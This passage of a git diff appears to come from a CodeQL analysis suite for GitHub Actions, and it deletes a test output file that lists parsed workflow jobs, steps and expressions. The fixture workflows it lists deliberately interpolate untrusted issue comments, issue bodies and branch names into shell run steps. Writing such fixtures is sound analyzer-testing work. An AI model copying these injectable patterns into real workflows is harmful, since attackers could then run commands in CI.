 "Potential privileged environment variable injection in $@, which may be controlled by an external user.",
 sink, sink.getNode().toString()
diff --git a/ql/test/library-tests/test.actual b/ql/test/library-tests/test.actual
deleted file mode 100644
index ee68d409634e..000000000000
--- a/ql/test/library-tests/test.actual
+++ /dev/null
@@ -1,598 +0,0 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| 
.github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ 
github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | 
steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 
echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | 
issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| 
.github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | 
-| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 
| LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | 
ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| 
.github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | 
.github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | 
.github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | 
Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| 
